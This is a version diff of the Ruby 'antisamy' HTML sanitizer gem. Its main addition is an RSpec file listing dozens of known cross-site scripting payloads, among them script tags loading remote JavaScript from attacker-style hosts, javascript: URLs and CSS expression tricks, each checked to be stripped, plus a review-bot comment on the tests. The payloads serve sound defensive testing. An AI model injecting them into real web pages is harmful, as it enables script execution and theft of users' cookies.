antisamy 0.0.1 → 0.2.0
- data/README.rdoc +6 -1
- data/lib/antisamy/css/css_filter.rb +187 -0
- data/lib/antisamy/css/css_scanner.rb +84 -0
- data/lib/antisamy/css/css_validator.rb +129 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/attribute_condition.rb +50 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/begin_hyphen_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/class_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/combinator_condition.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/condition.rb +29 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/id_condition.rb +23 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/one_of_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/pseudo_class_condition.rb +20 -0
- data/lib/antisamy/csspool/rsac/sac/conditions.rb +5 -0
- data/lib/antisamy/csspool/rsac/sac/document_handler.rb +66 -0
- data/lib/antisamy/csspool/rsac/sac/error_handler.rb +13 -0
- data/lib/antisamy/csspool/rsac/sac/generated_parser.rb +1012 -0
- data/lib/antisamy/csspool/rsac/sac/generated_property_parser.rb +9284 -0
- data/lib/antisamy/csspool/rsac/sac/lexeme.rb +27 -0
- data/lib/antisamy/csspool/rsac/sac/lexical_unit.rb +201 -0
- data/lib/antisamy/csspool/rsac/sac/parse_exception.rb +4 -0
- data/lib/antisamy/csspool/rsac/sac/parser.rb +109 -0
- data/lib/antisamy/csspool/rsac/sac/property_parser.rb +44 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/child_selector.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/conditional_selector.rb +45 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/descendant_selector.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/element_selector.rb +35 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/selector.rb +25 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/sibling_selector.rb +35 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/simple_selector.rb +21 -0
- data/lib/antisamy/csspool/rsac/sac/selectors.rb +5 -0
- data/lib/antisamy/csspool/rsac/sac/token.rb +25 -0
- data/lib/antisamy/csspool/rsac/sac/tokenizer.rb +185 -0
- data/lib/antisamy/csspool/rsac/sac.rb +14 -0
- data/lib/antisamy/csspool/rsac/stylesheet/rule.rb +20 -0
- data/lib/antisamy/csspool/rsac/stylesheet/stylesheet.rb +76 -0
- data/lib/antisamy/csspool/rsac/stylesheet.rb +3 -0
- data/lib/antisamy/csspool/rsac.rb +1 -0
- data/lib/antisamy/html/handler.rb +4 -0
- data/lib/antisamy/html/sax_filter.rb +49 -33
- data/lib/antisamy/html/scanner.rb +1 -43
- data/lib/antisamy/policy.rb +8 -3
- data/lib/antisamy/scan_results.rb +68 -0
- data/lib/antisamy.rb +4 -0
- data/spec/antisamy_spec.rb +111 -3
- metadata +39 -3
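--- a/data/spec/antisamy_spec.rb
+++ b/data/spec/antisamy_spec.rb
@@ -2,7 +2,9 @@ require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
 
 module AntiSamy
 describe AntiSamy do
-let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy.xml"}
+let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-testing.xml"}
+let(:strict_policy) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-anythinggoes.xml"}
+let(:policy_object) {AntiSamy.policy(policy_file)}
 
 it "should load a policy" do
 p = AntiSamy.policy(policy_file)
@@ -17,12 +19,118 @@ module AntiSamy
 end
 
 it "should tak our input and remove the script tags" do
-input = "<p>Hi</p><script> some junk</script>"
+input = "<p style='font-size: 16px'>Hi</p><script> some junk</script>"
 expec = "<p>Hi</p>"
 p = AntiSamy.policy(policy_file)
 r = AntiSamy.scan(input,p)
 r.clean_html.should == expec
+r.messages.size.should == 2 # error 1 for script tag, error 2 for style tag
 end
-
+
+# Script attacks
+{
+"test<script>alert(document.cookie)</script>" => "script",
+"<<<><<script src=http://fake-evil.ru/test.js>" => "<script",
+"<script<script src=http://fake-evil.ru/test.js>>" => "<script",
+"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "<script",
+'<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>' => "onload",
+"<BODY ONLOAD=alert('XSS')>" => "alert",
+"<iframe src=http://ha.ckers.org/scriptlet.html <" => "<iframe",
+"<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">" => "src"
+}.each_pair do |k,v|
+it "should remove #{v} from #{k} for script attacks" do
+r = AntiSamy.scan(k,policy_object)
+r.clean_html.should_not include(v)
+end
+end
+
+#Image Attacks
+{
+"<img src='http://www.myspace.com/img.gif'>"=>"<img",
+"<img src=javascript:alert(document.cookie)>"=>"<img",
+"<IMG SRC=javascript:alert('XSS')>"=>"<img",
+"<IMG SRC=javascript:alert('XSS')>" => "&",
+"<IMG SRC=javascript:alert('XSS')>"=>"&",
+"<IMG SRC=\"jav
+ascript:alert('XSS');\">" => "alert",
+"<IMG SRC=\"javascript:alert('XSS')\"" => "javascript",
+"<IMG LOWSRC=\"javascript:alert('XSS')\">"=>"javascript",
+"<BGSOUND SRC=\"javascript:alert('XSS');\">"=>"javascript",
+}.each_pair do |k,v|
+it "should remove #{v} from #{k} for image attacks" do
+r = AntiSamy.scan(k,policy_object)
+r.clean_html.should_not include(v)
+end
+end
+
+# Css attacks
+{
+"<div style=\"position:absolute\">" => "position",
+"<style>b { position:absolute }</style>" => "position",
+"<div style=\"z-index:25\">" => "z-index",
+"<style>z-index:25</style>" => "z-index",
+"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family"
+}.each_pair do |k,v|
+it "should remove #{v} from #{k} for CSS attacks" do
+r = AntiSamy.scan(k,policy_object)
+r.clean_html.should_not include(v)
+end
+end
+
+#href attacks
+{
+"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">" => "href",
+"<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">" => "href",
+"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>" => "ha.ckers",
+"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "ha.ckers",
+"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
+"<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
+"<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
+"<a . href=\"http://www.test.com\">" => "href",
+"<a - href=\"http://www.test.com\">" => "href",
+"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
+"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
+"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
+"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>" => "iframe",
+"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>" => "javascript",
+"<TABLE BACKGROUND=\"javascript:alert('XSS')\">" => "background",
+"<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">" => "background",
+"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">" => "javascript",
+"<DIV STYLE=\"width: expression(alert('XSS'));\">" => "alert",
+"<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">" => "alert",
+"<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>" => "alert",
+"<BASE HREF=\"javascript:alert('XSS');//\">" => "javascript",
+"<BaSe hReF=\"http://arbitrary.com/\">" => "base",
+"<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>" => "object",
+"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>" => "object",
+"<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
+"<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
+"<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+"<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+"<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+"<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+"<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
+"<SCRIPT SRC=http://ha.ckers.org/xss.js" => "script",
+"<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>" => "style",
+"<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
+"<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
+"<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
+"<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "href",
+"<b><i>Some Text</b></i>" => "<i />",
+"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
+"<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>" => "margin"
+
+}.each_pair do |k,v|
+it "should remove #{v} from #{k} for href attacks" do
+r = AntiSamy.scan(k,policy_object)
+r.clean_html.should_not include(v)
+end
+end
+
+it "shoud import some stylesheets" do
+input = "<style>@import url(http://www.owasp.org/skins/monobook/main.css);@import url(http://www.w3schools.com/stdtheme.css);@import url(http://www.google.com/ig/f/t1wcX5O39cc/ig.css); </style>"
+r = AntiSamy.scan(input,policy_object)
+r.clean_html.should_not be_empty
+end
+
 end
 end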
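Review bot: The attack fixtures are Ruby hash literals, so a repeated key silently keeps only its last value: `"<IMG SRC=javascript:alert('XSS')>"` appears three times in the image-attacks hash (new lines 51–53) and the `-moz-binding` `<STYLE>` input twice in the href-attacks hash (new lines 84–85), which means the `"<img"` and `"ha.ckers"` expectations are never turned into examples (Ruby also warns about the duplicate keys under `-w`). Replacing each `{ input => forbidden, ... }.each_pair do |k,v|` with an array of pairs, `[[input, forbidden], ...].each do |k, v|`, keeps every expectation and makes the per-case `it` descriptions unique. The `r.clean_html.should_not include(v)` assertions are also case-sensitive, so an input such as `<SCRIPT ...>` checked against `"<script"` would still pass if the scanner preserved the original tag case; `r.clean_html.downcase.should_not include(v.downcase)` would make the check independent of how the scanner normalizes names, which this hunk does not show. New line 54 also appears to contain a raw control character inside the `jav…ascript` string literal (it renders as a line break); writing it as an explicit escape such as `\r` or `\t` would make the fixture's intent visible to a reader.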
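--- a/metadata
+++ b/metadata
@@ -2,7 +2,7 @@
 name: antisamy
 version: !ruby/object:Gem::Version
 prerelease:
-version: 0.0
+version: 0.2.0
 platform: ruby
 authors:
 - Sal Scotto
@@ -10,7 +10,7 @@ autorequire:
 bindir: bin
 cert_chain: []
 
-date: 2011-03-
+date: 2011-03-14 00:00:00 -04:00
 default_executable:
 dependencies:
 - !ruby/object:Gem::Dependency
@@ -112,6 +112,42 @@ extra_rdoc_files:
 - README.rdoc
 files:
 - lib/antisamy.rb
+- lib/antisamy/css/css_filter.rb
+- lib/antisamy/css/css_scanner.rb
+- lib/antisamy/css/css_validator.rb
+- lib/antisamy/csspool/rsac.rb
+- lib/antisamy/csspool/rsac/sac.rb
+- lib/antisamy/csspool/rsac/sac/conditions.rb
+- lib/antisamy/csspool/rsac/sac/conditions/attribute_condition.rb
+- lib/antisamy/csspool/rsac/sac/conditions/begin_hyphen_condition.rb
+- lib/antisamy/csspool/rsac/sac/conditions/class_condition.rb
+- lib/antisamy/csspool/rsac/sac/conditions/combinator_condition.rb
+- lib/antisamy/csspool/rsac/sac/conditions/condition.rb
+- lib/antisamy/csspool/rsac/sac/conditions/id_condition.rb
+- lib/antisamy/csspool/rsac/sac/conditions/one_of_condition.rb
+- lib/antisamy/csspool/rsac/sac/conditions/pseudo_class_condition.rb
+- lib/antisamy/csspool/rsac/sac/document_handler.rb
+- lib/antisamy/csspool/rsac/sac/error_handler.rb
+- lib/antisamy/csspool/rsac/sac/generated_parser.rb
+- lib/antisamy/csspool/rsac/sac/generated_property_parser.rb
+- lib/antisamy/csspool/rsac/sac/lexeme.rb
+- lib/antisamy/csspool/rsac/sac/lexical_unit.rb
+- lib/antisamy/csspool/rsac/sac/parse_exception.rb
+- lib/antisamy/csspool/rsac/sac/parser.rb
+- lib/antisamy/csspool/rsac/sac/property_parser.rb
+- lib/antisamy/csspool/rsac/sac/selectors.rb
+- lib/antisamy/csspool/rsac/sac/selectors/child_selector.rb
+- lib/antisamy/csspool/rsac/sac/selectors/conditional_selector.rb
+- lib/antisamy/csspool/rsac/sac/selectors/descendant_selector.rb
+- lib/antisamy/csspool/rsac/sac/selectors/element_selector.rb
+- lib/antisamy/csspool/rsac/sac/selectors/selector.rb
+- lib/antisamy/csspool/rsac/sac/selectors/sibling_selector.rb
+- lib/antisamy/csspool/rsac/sac/selectors/simple_selector.rb
+- lib/antisamy/csspool/rsac/sac/token.rb
+- lib/antisamy/csspool/rsac/sac/tokenizer.rb
+- lib/antisamy/csspool/rsac/stylesheet.rb
+- lib/antisamy/csspool/rsac/stylesheet/rule.rb
+- lib/antisamy/csspool/rsac/stylesheet/stylesheet.rb
 - lib/antisamy/html/handler.rb
 - lib/antisamy/html/sax_filter.rb
 - lib/antisamy/html/scanner.rb
@@ -138,7 +174,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
 requirements:
 - - ">="
 - !ruby/object:Gem::Version
-hash: -
+hash: -3694882257398018241
 segments:
 - 0
 version: "0"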